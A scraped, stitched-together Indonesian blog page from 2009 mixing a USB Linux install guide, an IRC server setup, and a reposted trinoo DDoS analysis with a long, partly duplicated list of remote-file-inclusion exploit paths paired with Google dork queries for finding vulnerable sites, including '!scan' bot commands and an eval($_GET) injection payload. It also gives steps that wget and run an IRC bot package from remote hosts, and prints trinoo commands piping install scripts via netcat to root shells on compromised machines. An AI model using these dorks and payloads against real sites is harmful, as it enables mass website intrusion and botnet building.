Posted by admin | Linux | Thursday 2 April 2009 4:06 am
Selain Windows, sistem operasi Linux juga bisa dijalankan dari sebuah USB (flash disk). Hanya dalam 5 menit, Anda dapat menginstal Linux dari USB.
Anda bisa menggunakan tools bernama UNetbootin. Untuk bisa menginstal Linux dari flash disk, Anda wajib memiliki flash disk berkapasitas meinimal 1GB.
Selain USB, pastikan Anda telah menentukan distribusi Linux yang diinginkan, yaitu: Arch linux, BackTrack, CentOS, CloneZilla, Damn Small Linux, Debian, Dream Linux, Elive, FaunOS, Fedora, Frugalware, Gentoo, Gujin, Kubuntu, Linux Mint, Mandriva, netBSD, NTPasswr, openSUSE, Ophcrack, Parted Magic, PClinuxOS, Puppy Linux, Slax, SliTaZ, Smart Boot Manager, Super Grub Disk, Ubuntu, Xubunu, Zenwalk.
Sebagai contoh, instalasi kali ini menggunakan distro Linux BackTrack 3 dan Ubuntu 8.04.1 LTS, dengan USB Kingstone DataTraveler 2.0 1GB. Berikut langkah-langkah instalasinya :
1. Download UNetbootin, simpan pada desktop.
2. Klik kanan UNetbootin pada desktop, lalu pilih Properties.
3. Klik tab Permissions, beri tanda centang (v) pada kotak ‘Allow executing file as program’, lalu klik tombol Close.
4. Tancapkan terlebih dulu USB ke port komputer. Ini sangat penting karena Anda tidak akan bisa menggunakan USB jika menancapkannya setelah Anda membuka aplikasi UNetbootin.
5. Selanjutnya, klik dua kali file exe UNetbootin yang sudah di-download tadi, lalu ketikkan password hingga aplikasi UNetbootin terbuka.
6. Pilih distribusi dan versi Linux yang Anda inginkan, lalu pilih tipe instalasi dan klik Ok untuk memulai instalasi.
Selesai! Reboot komputer Anda dan booting-lah dari USB. Kini Anda dapat menggunakan sistem operasi Linux portabel Anda
BackTrack : http://www.pungli.org/pannel/edit++6+tahap+menginstal+linux+dengan+us
belajarbisnis
Jumat, 17 Juli 2009
Kamis, 16 Juli 2009
bug dork
Close
Snap Shares for charity
revoTeaM Site
Nothing Perfect Humans in The Worlds
* History
bug dorks for scaner
* 09/04/2009 – 6:31 pm
* Ditulis dalam tips and trik
* Tinggalkan sebuah Komentar
Exploits Bug Dork For Scanner.
docs/front-end-demo/cart2.php?workdir= “inurl%3A%22aLogIn.php%22″
docs/front-end-demo/cart2.php?workdir= inurl:hosting.php?spt=
/bemarket/postscript/postscript.php?p_mode= /bemarket/
index.php?mode= inurl:”*.php?mode=join” friend
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root= inurl:/modules/icontent
modules/coppermine/themes/default/theme.php?THEME_DIR= Powered By Coppermine Photo Gallery v1.2.2b
/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan modify.php?dir_module= allinurl%3Axfsection+site%3Ajp
/modules/userstop/userstop.php?exbb[home_path]= Powered by ExBB
index.php?page= allinurl%3Aindex.php%3Fpagedb%3D
contenido/external/frontend/news.php?cfg[path][includes]= cms/front_content.php?idcat=
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo” site:gov
includes/include_once.php?include_file= allinurl%3A%2Fproduct_info.php%3Fcust_id%3D”
mygallerybrowser.php?myPath= inurl:%22/mygallery/myfunctions/%22
admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir= “LimeSurvey”
admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/Root.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/File.php?homedir= “LimeSurvey”
phpbb/sendmsg.php?phpbb_root_path= “Flashbb”
PPPoE/admin_modules/admin_module_deldir.inc.php?config[path_src_include]= “Powered by yappa-ng 2.3.1″
library/authorize.php?login_form= “PhpHostBot”
historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
index.php?page= inurl:index.php%”Submit%Articles”%”Member%Login”%”Top%Authors”
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= “Nuke ET Copyright � 2004 por Truzone.”
modules/admin/vw_usr_roles.php?baseDir= “dotProject logo”
modules/Forums/admin/admin_users.php?phpbb_root_path= %22modules.php%3Fname%3DForums%22
@scan 1000 includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]= “Powered+by+CubeCart+3.0.0″
eva/imprim.php3?aide= “Eva-Web”
index.php?s= index.php?s=
!scan index.php?a= index.php?a=
/xcart/config.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=cart
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=pages
/ws/get_events.php?includedir= WebCalendar
agenda2.php3?rootagenda= phpmyagenda
modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= inurl:”vwar”
/templates/tmpl_dfl/scripts/index.php?dir[inc]= “Powered by : Dolphin Web Community Software”
admin/business_inc/saveserver.php?thisdir= Confixx Professional
protection.php?action=logout&siteurl= PHPFanBase
modify.php?dir_module= allinurl%3Axfsection
classes/phpmailer/class.cs_phpmailer.php?classes_dir= inurl:cs-cart
!scan wp-pass.php?_wp_http_referer= “powered by wordpress”
.scan index.php?abs_path= index.php?action=viewcart
/modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
index.php?func= “Powered by FlashGameScript”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]= inurl:”sohoadmin”
sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= inurl:”index.php?pr=Services”
/include.php?path=psp/user.php&site=psp/include.php?path=psp/user.php&site= “Punktesystem Pro”
ws/login.php?noSet=0&includedir= “WebCalendar”
!scan login.php?svr_rootscript= allinurl:order?page=plan_show
modules/MDForum/includes/functions_admin.php?phpbb_root_path= “powered by MDForum”
/newsboard//admin/addons/archive/archive.php?adminfolder= “/newsboard/”
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= “/vwar/”
anguage/lang_german/lang_main_album.php?phpbb_root_path= phpbbplus
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “.uk/index.php”+”option”
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:br
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” site:il
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= com_frontpage site:my
eva/index.php3?aide= “Eva-Web”
/vwar/convert/mvcw.php?step=1&vwar_root= vwar
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenuXL
/bin/TreeMenuXL.php?_SERVER[DOCUMENT_ROOT]= “HTML_TreeMenu”
/photo_comment.php?toroot= �Exhibit Engine 1.5 RC 4″
protection.php?action=logout&siteurl= allinurl%3Amembers.php%3Fid%3Dall+site%3Anet
/accounts/inc/include.php?language=0&lang_settings[0][1]= “powered by Icewarp”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “powered by boonex”
plugins/safehtml/HTMLSax3.php?dir[plugins]= “netcat require”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “powered by CMS Made Simple version”
includes/include_once.php?include_file= create_account.php?PHPSESSID=
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= “Powered By Zen Cart”
index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= Copyright � 2003-2006 Zen Cart
/inc/header.php/step_one.php?server_inc= step_one.php?sid
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_joomap
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_jpgraph
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_letterman
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_swmenufree
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_bsq_sitestats
components/com_livechat/livechat.html.php?mosConfig_absolute_path= com_livechat
components/com_mypms/class.mypms.php?mosConfig_absolute_path= com_mypms
/admin/classes/TplLoad.php?full_path_to_public_program= /TplLoad.php/
/kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act= /kboard.php?board=
/index.php?abg_path= Africa Be Gone
errors.php?error= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact=
/LightTwoOh/sidebar.php?loadpage= phpAutoVide
/com_joomnik/admin.joomnik.html.php?mosConfig_absolute_path= com_joomnik
/com_joomlaflashfun/admin.joomlaflashfun.php?= com_joomlaflashfun
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= com_admin
/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop
/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= com_lurm_constructor
!scan tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0.4
!scan modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= xoopsgallery
!scan /config.inc.php?path_escape= XZero Community Classified
!scan /php121adminconfig.php?mosConfig_absolute_path= PHP121
!scan /common/db.php?commonpath= “samPHPweb”
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_rss
path/bridge/yabbse.inc.php?sourcedir= Coppermine Photo Gallery
!scan /lib/functions.php?DOC_ROOT= intitle:”OFFL – Login”
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= “/index.php?option=com_joomlaradiov5″
calogic/clmcpreload.php?CLPATH= calogic
modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= modules.php?name=
modifyform.html?code= modifyform.html?*=*
components/com_joomlalib/standalone/stubjambo.php?baseDir= com_frontpage
# com_jce # NEW BUG SECURITY PHP 9/15/07 10:05 pm
# com_jim # NEW BUG SECURITY PHP 9/15/07 9:12 pm
# com_jreactions # NEW BUG SECURITY PHP 9/15/07 8:56 pm
# com_neoreferences # NEW BUG SECURITY PHP 9/15/07 8:
# com_quran # NEW BUG SECURITY PHP 9/15/07 7:49 pm
# com_datsogallery # NEW BUG SECURITY PHP 9/15/07 7:47 pm
# com_ricettario # NEW BUG SECURITY PHP 9/15/07 7:38 pm
# com_ab_calendar # NEW BUG SECURITY PHP 9/15/07 7:14 p
# com_joomlalib # NEW BUG SECURITY PHP 9/15/07 6:27 pm
/language/lang_german/lang_main_album.php?phpbb_root_path=
“Powered by phpBB2 Plus”
!scan administrator/components/com_jreactions/langset.php?comPath= Joomla J! Reactions
!scan language/lang_english/lang_main_album.php?phpbb_root_path= phpbb inurl:album.php site:uk
!scan /rconfig.inc.php?config[root_dir]= amember Pro / amember
Solo @rfi /language/lang_english/lang_main_album.php?phpbb_root_path= “Powered by phpBB2 Plus”
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_joomlaboard
administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path= com_frontpage
components/com_datsogallery/datsogallery.php?mosConfig_absolute_path= com_frontpage
administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path= com_frontpage
mcconfig.php?CLPATH= calogic Philip Boone
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_sobi2
components/com_hotproperty/components/com_hotproperty/hotproperty.php?mosConfig_absolute_path= com_acajoom
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= “.tr./components” “.tr./components”
components/com_contxtd/contxtd.class.php?mosConfig_absolute_path= com_contxtd
administrator/components/com_joomla-visites/admin.joomla-visites.php?mosConfig_absolute_path= components/com_blastchatc/blastchatc.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=
/components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=
administrator/components/com_uddeim/admin.uddeim.php?mosConfig_absolute_path= com_uddeim
components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= com_rwcards
administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path= com_rwcards
mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT= “Powered by SocketMail”
modules/Forums/favorites.php?nuke_bb_root_path= Powered by Platinum 7.6.b.5
!scan administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path= com_chronocontact
includes/include_once.php?include_file= Click to View Our Catalog
rconfig.inc.php?config[root_dir]= aMember PRO
index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
/components/com_joomlalib/standalone/stubjambo.php?baseDir= com_performs
!scan /_theme/breadcrumb.php?rootBase= “!new Female Celebrities”
urlinn_includes/config.php?dir_ws= put a copy/past from URL
/_inc/config.php?rootBase= “! Hide Your Friends & Comments”
!scan includes/functions_admin.php?phpbb_root_path= pNphpBB2
tiny_includes/config.php?dir_ws= put a copy/past from URL
/_theme/_siteColors.php?rootBase= ‘page generated in’ time?
!alls index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path= com_performs
!alls index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path= com_joomlaxplorer
com_neolegal | com_dfcontact | com_massmail | com_syndicate |com_categories |com_newsfeeds | com_banners |
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= 2004 Miro International Pty Ltd.
administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path= com_chronocontact
=============================
administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=
administrator/components/com_pinboard/install.pinboard.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.php?mosConfig_absolute_path=
administrator/components/com_visualrecommend/admin.visualrecommend.php?mosConfig_absolute_path=
components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=
components/com_utchat/utchat.php?mosConfig_absolute_path=
components/com_google_maps/google_maps.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= com_peoplebook
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= webshop
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= CubeCart
/tools/send_reminders.php?includedir= day.php?date=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage
config/config_admin.php?INC= “Your Search Starts Here”
config_member.php?INC= “Your Search Starts Here”
config/config_member.php?INC= “Your Search Starts Here”
membuat bot eggdrop
* 03/04/2009 – 7:33 pm
* Ditulis dalam Tutor
* Tinggalkan sebuah Komentar
Langkah2 membuat Bot Eggdrop:
Sebelumnya anda pastikan dulu ingin di load dimana botnya, disini ada 2 server yg bisa digunakan. Irc.Allnetwork.Org & Irc.Byroe.Net. Setelah itu siapkan Shell dan langsung saja masukan semua comand ini ke dalam shell, tunggu botnya masuk kedalam chan km. Selamat Mencoba
### Irc.Allnetwork.Org ###
1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/jongke_city/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (nick-bot) (ident-bot) (ip-shell) (channel) (owner)
contoh tuk no.7 : ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada
8. cd scripts
9. wget geocities.com/jongke_city/ sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]
### Irc.Byroe.Net ###
1. cd /var/tmp
2. wget geocities.com/jiwangdotus/eggmbonx.tar.gz
3. tar -zxvf eggmbonx.tar.gz
4. cd mbonx
5. wget geocities.com/script_help/chanary.txt
6. mv chanary.txt chanary.conf
7. ./nadya conf (nick-bot) (ident-bot) (ip-shell) (channel) (owner)
contoh tuk no.7 : ./nadya conf Estrada-Bot Bot 202.135.14.21 solo_underground Estrada
8. cd scripts
9. wget geocities.com/script_help/ sOlTecH.txt
10. mv sOlTecH.txt ary.tcl
11. ./autobotchk conf
12. cd ..
13. ./run conf [httpd]
Thx For ROZI my Owner
INSTAL IRCD
* 01/04/2009 – 8:08 pm
* Ditulis dalam Tutor
* Tinggalkan sebuah Komentar
Anda pasti pernah dengar tentang Ircd? yang identik dengan server & networks. Untuk yang baru pertama kali instal ircd mungkin agak membingungkan dan terkadang sering eror pada bagian akhirnya. Disini akan di jelaskan bagaimana langkah – langkahnya dan bagaimana cara mengatasi masalahnya. Lets Go On Guys… :)
Pertama – tama siapkan shell yang dari linux maupun freeBSD, perbedaanya cuma pemakaian commands`nya. Tentunya banyak yang sudah tau, ya khan? :P
Selanjutnya kita buka shell & buat directoy dahulu untuk menaruh file ircdnya, dan sebelumnya cek dulu dimana posisi directory kita:
pwd
/home/estrada
mkdir solo
nb: solo <= contoh nama directory baru, tempat kita menyimpan file.
Setelah itu kita tinggal masuk ke directory baru kita dan mengexsesekusinya:
1. cd /solo
2. wget http://bdd.exolia.net/serveurs/Unreal3.2.7.tar.gz
3. tar -zxvf Unreal3.2.7.tar.gz
4. cd Unreal3.2.7
5. ./Config
Kalau ada konfirmasi meminta -[ Enter]- Anda tekan Enter aja terus sampai menunjukan 100%.
6. make
Setelah di make anda edit dulu configurasi dari unrealircd.conf, connect.conf, oper.conf, ircd.mtod nya. Untuk Linux gunakan “vi” Sedangkan untuk FreeBSD bisa digunakan “pico” untuk mengedit configurasinya, tergantung support tidaknya. untuk menyimpan file yang telah di edit gunakan comand “Esc + :wq + enter”.
vi unrealircd.conf
vi connect.conf
vi oper.conf
vi ircd.motd
Setelah semua selesai di edit configurasinya exsekusi dengan :
7. make install
8. ./unreal start
Nah selesai sudah, sekarang anda memiliki server sendiri. :P
Cukup sekian dulu penjelasanya, kalau ada yg perlu ditanyakan saran dan kritik akan kami terima dengan lapang dada. :)
NB: Untuk contoh unrealircd.conf, connect.conf, oper.conf anda bisa lihat di kategori IRCD.
Thanks Regard To :
Dj-RuFfy – NOGGLENK – ROZI And Sekip Crew – Cavalera And Habbat Crew.
Irc.Mildnet.Org Crew
Irc.Allindo.Net Crew
Irc.Indoirc.Net Crew
Irc.Byroe.Net Crew
trinoo.analysis
* 01/04/2009 – 6:59 pm
* Ditulis dalam hacking
* Tinggalkan sebuah Komentar
==========================================================================
The DoS Project's "trinoo" distributed denial of service attack tool
==========================================================================
David Dittrich
University of Washington
Copyright 1999. All rights reserved.
October 21, 1999
Introduction
------------
The following is an analysis of the DoS Project's "trinoo" (a.k.a.
"trin00") master/slave programs, which implement a distributed
network denial of service tool.
Trinoo daemons were originally found in binary form on a number of
Solaris 2.x systems, which were identified as having been compromised
by exploitation of buffer overrun bugs in the RPC services "statd",
"cmsd" and "ttdbserverd". These attacks are described in CERT
Incident Note 99-04:
http://www.cert.org/incident_notes/IN-99-04.html
The trinoo daemons were originally believed to be UDP based,
access-restricted remote command shells, possibly used in conjunction
with sniffers to automate recovering sniffer logs.
During investigation of these intrusions, the installation of a trinoo
network was caught in the act and the trinoo source code was obtained
from the account used to cache the intruders' tools and log files.
This analysis was done using this recovered source code.
Modification of the source code would change any of the details
in this analysis, such as prompts, passwords, commands, TCP/UDP port
numbers, or supported attack methods, signatures, and features.
The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0
systems. The master was compiled and run on Red Hat Linux 6.0. It is
believed that both master and daemon have been witnessed "in the
wild" on these same platforms.
Trinoo networks are probably being set up on hundreds, perhaps
thousands, of systems on the Internet that are being compromised by
remote buffer overrun exploitation. Access to these systems is
probably being perpetuated by the installation of multiple "back
doors" along with the trinoo daemons.
A trinoo network of at least 227 systems -- 114 of these at Internet2
sites -- was used on August 17, 1999 to flood a single system at the
University of Minnessota, swamping the target network and rendering it
unusable for over two days. While responding to this attack, large
flows were also noticed going to at least sixteen other systems, some
outside the US. (See Appendix D for a report of part of this trinoo
attack.)
Attack scenario
---------------
A typical installation might go something like this.
1). A stolen account is set up as a repository for pre-compiled
versions of scanning tools, attack (i.e. buffer overrun exploit)
tools, root kits and sniffers, trinoo daemon and master programs,
lists of vulnerable hosts and previously compromised hosts, etc. This
would normally be a large system with many users, one with little
administrative oversight, and on a high-bandwidth connection for rapid
file transfer.
2). A scan is performed of large ranges of network blocks to identify
potential targets. Targets would include systems running various
services known to have remotely exploitable buffer overflow security
bugs, such as wu-ftpd, RPC services for "cmsd", "statd",
"ttdbserverd", "amd", etc. Operating systems being targeted appear to
be primarily Sun Solaris 2.x and Linux (due to the ready availability
of network sniffers and "root kits" for concealing back doors, etc.),
but stolen accounts on any architecture can be used for caching tools
and log files.
3). A list of vulnerable systems is then used to create a script that
performs the exploit, sets up a command shell running under the root
account that listens on a TCP port (commonly 1524/tcp, the
"ingreslock" service port), and connects to this port to confirm the
success of the exploit. In some cases, an electronic mail message is
sent to an account at a free web based email service to confirm which
systems have been compromised.
The result is a list of "owned" systems ready for setting up
back doors, sniffers, or the trinoo daemons or masters.
4). From this list of compromised systems, subsets with the desired
architecture are chosen for the trinoo network. Pre-compiled binaries
of the trinoo daemon are created and stored on a stolen account
somewhere on the Internet.
5). A script is then run which takes this list of "owned" systems and
produces yet another script to automate the installation process,
running each installation in the background for maximum multitasking.
This script uses "netcat" ("nc") to pipe a shell script to the root
shell listening on, in this case, port 1524/tcp:
---------------------------------------------------------------------------
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
./trin.sh | nc 128.aaa.167.219 1524 &
./trin.sh | nc 128.aaa.187.38 1524 &
./trin.sh | nc 128.bbb.2.80 1524 &
./trin.sh | nc 128.bbb.2.81 1524 &
./trin.sh | nc 128.bbb.2.238 1524 &
./trin.sh | nc 128.ccc.12.22 1524 &
./trin.sh | nc 128.ccc.12.50 1524 &
. . .
---------------------------------------------------------------------------
The script "trin.sh", whose output is being piped to these systems,
looks like:
---------------------------------------------------------------------------
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
---------------------------------------------------------------------------
Depending on how closely crontab files are monitored, or if they are
used at all, this may be detected easily. If cron is not used at all
by this user (usually root), it may not be detected at all.
Another method was witnessed on at least one other system, where the
daemon was named "xterm", and was started using a script (named "c" on
the system on which it was found) that contains:
---------------------------------------------------------------------------
cd /var/adm/.1
PATH=.:$PATH
export PATH
xterm 1>/dev/null 2>&1
---------------------------------------------------------------------------
This would supposedly imply a method of running this script on demand
to set up the trinoo network.
Even more subtle ways of having trinoo daemons/masters lie in wait for
execution at a given time are easy to envision (e.g., UDP or ICMP
based client/server shells, such as LOKI (see Appendix C) , programs
that wake up periodically and open a listening TCP or UDP port, etc.)
The result of this automation is the ability for attackers to set up
the denial of service network, on widely dispersed systems whose true
owners don't even know are out of their control, in a very short time
frame.
6). Optionally, a "root kit" is installed on the system to hide the
presence of programs, files, and network connections. This is more
important on the master system, since these systems are key to the
trinoo network. (It should be noted that in many cases, masters have
been set up on Internet Service Providers' primary name server hosts,
which would normally have extremely high packet traffic and large
numbers of TCP and UDP connections, which would effectively hide any
trinoo related traffic or activity, and would likely not be detected.
(The fact that these are primary name servers would also tend to make
the owners less likely to take the system off the Internet when
reports begin to come in about suspected denial of service related
activity.)
Root kits would also be used on systems running sniffers that, along
with programs like "hunt" (TCP/IP session hijacking tool) are used to
burrow further into other networks directly, rather than through
remote buffer overrun exploits (e.g., to find sites to set up new file
repositories, etc.)
For more on "root kits" and some ways to get around them, see:
http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq
The network: attacker(s)-->master(s)-->daemon(s)-->victim(s)
------------------------------------------------------------
The trinoo network is made up of a master server ("master.c") and the
trinoo daemon ("ns.c"). A trinoo network would look like this:
+----------+ +----------+
| attacker | | attacker |
+----------+ +----------+
| |
. . . --+------+---------------+------+----------------+-- . . .
| | |
| | |
+----------+ +----------+ +----------+
| master | | master | | master |
+----------+ +----------+ +----------+
| | |
| | |
. . . ---+------+-----+------------+---+--------+------------+-+-- . . .
| | | | |
| | | | |
+--------+ +--------+ +--------+ +--------+ +--------+
| daemon | | daemon | | daemon | | daemon | | daemon |
+--------+ +--------+ +--------+ +--------+ +--------+
The attacker(s) control one or more "master" servers, each of which
can control many "daemons" (known in the code as "Bcast", or
"broadcast" hosts.) The daemons are all instructed to coordinate a
packet based attack against one or more victim systems.
All that is then needed is the ability to establish a TCP connection
to the master hosts using "telnet" and the password to the master
server to be able to wage massive, coordinated, denial of service
attacks.
Communication ports
-------------------
Attacker to Master(s): 27665/tcp
Master to daemon(s): 27444/udp
Daemon to Master(s): 31335/udp
Remote control of the trinoo master is accomplished via a TCP
connection to port 27665/tcp. After connecting, the user must give
the proper password ("betaalmostdone"). If
Snap Shares for charity
revoTeaM Site
Nothing Perfect Humans in The Worlds
* History
bug dorks for scaner
* 09/04/2009 – 6:31 pm
* Ditulis dalam tips and trik
* Tinggalkan sebuah Komentar
Exploits Bug Dork For Scanner.
docs/front-end-demo/cart2.php?workdir= “inurl%3A%22aLogIn.php%22″
docs/front-end-demo/cart2.php?workdir= inurl:hosting.php?spt=
/bemarket/postscript/postscript.php?p_mode= /bemarket/
index.php?mode= inurl:”*.php?mode=join” friend
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root= inurl:/modules/icontent
modules/coppermine/themes/default/theme.php?THEME_DIR= Powered By Coppermine Photo Gallery v1.2.2b
/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan modify.php?dir_module= allinurl%3Axfsection+site%3Ajp
/modules/userstop/userstop.php?exbb[home_path]= Powered by ExBB
index.php?page= allinurl%3Aindex.php%3Fpagedb%3D
contenido/external/frontend/news.php?cfg[path][includes]= cms/front_content.php?idcat=
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo” site:gov
includes/include_once.php?include_file= allinurl%3A%2Fproduct_info.php%3Fcust_id%3D”
mygallerybrowser.php?myPath= inurl:%22/mygallery/myfunctions/%22
admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir= “LimeSurvey”
admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/Root.php?homedir= “LimeSurvey”
admin/classes/pear/OLE/PPS/File.php?homedir= “LimeSurvey”
phpbb/sendmsg.php?phpbb_root_path= “Flashbb”
PPPoE/admin_modules/admin_module_deldir.inc.php?config[path_src_include]= “Powered by yappa-ng 2.3.1″
library/authorize.php?login_form= “PhpHostBot”
historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
index.php?page= inurl:index.php%”Submit%Articles”%”Member%Login”%”Top%Authors”
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= “Nuke ET Copyright � 2004 por Truzone.”
modules/admin/vw_usr_roles.php?baseDir= “dotProject logo”
modules/Forums/admin/admin_users.php?phpbb_root_path= %22modules.php%3Fname%3DForums%22
@scan 1000 includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]= “Powered+by+CubeCart+3.0.0″
eva/imprim.php3?aide= “Eva-Web”
index.php?s= index.php?s=
!scan index.php?a= index.php?a=
/xcart/config.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=cart
classes/phpmailer/class.cs_phpmailer.php?classes_dir= index.php?target=pages
/ws/get_events.php?includedir= WebCalendar
agenda2.php3?rootagenda= phpmyagenda
modules/vwar/convert/mvcw_conver.php?step=1&vwar_root= inurl:”vwar”
/templates/tmpl_dfl/scripts/index.php?dir[inc]= “Powered by : Dolphin Web Community Software”
admin/business_inc/saveserver.php?thisdir= Confixx Professional
protection.php?action=logout&siteurl= PHPFanBase
modify.php?dir_module= allinurl%3Axfsection
classes/phpmailer/class.cs_phpmailer.php?classes_dir= inurl:cs-cart
!scan wp-pass.php?_wp_http_referer= “powered by wordpress”
.scan index.php?abs_path= index.php?action=viewcart
/modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
index.php?func= “Powered by FlashGameScript”
